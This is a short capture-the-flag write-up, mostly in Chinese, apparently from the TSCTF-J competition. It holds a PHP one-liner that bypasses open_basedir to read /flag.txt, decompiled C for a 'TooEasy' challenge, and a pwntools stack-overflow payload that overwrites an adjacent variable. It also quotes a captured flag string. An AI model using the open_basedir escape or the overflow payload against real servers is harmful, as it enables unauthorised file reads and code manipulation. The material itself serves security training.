<?php ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(file_get_contents("/flag.txt"));?>
# PWN
# TooEasy
观察到
-00000070 name db 100 dup(?)
-0000000C flag dd ?
-00000008 anonymous_0 dd ?
char name[100]; // [esp+0h] [ebp-70h] [esp+0] [ebp-112]
int flag; // [esp+100] [ebp-12]
int *v6; // [esp+68h] [ebp-8h]
int __cdecl main(int argc, const char **argv, const char **envp)
{
int result; // eax
char name[100]; // [esp+0h] [ebp-70h]
int flag; // [esp+64h] [ebp-Ch]
int *v6; // [esp+68h] [ebp-8h]
v6 = &argc;
flag = 1131796;
puts("please write down your name!");
recv(name);
if ( flag == 305419896 )
{
fun();
result = 1;
}
else
{
puts(name);
puts((const char *)flag);
result = 0;
}
return result;
}
利用输入的name溢出可以直接修改flag变量的值
从而得到flag
#payload
from pwn import *
conn = remote("node.buptmerak.cn","10021")
p = b'a'*100+p32(305419896)
conn.send(p)
conn.interactive()
#TSCTF-J{WoW!_Thi5_pR0gr4m_1s_h@cK3d}
# checkin
# 从下载开始
签到题,下下来运行就行了 得到个二维码和关键词 关注发一下TSCTF-J就得到flag了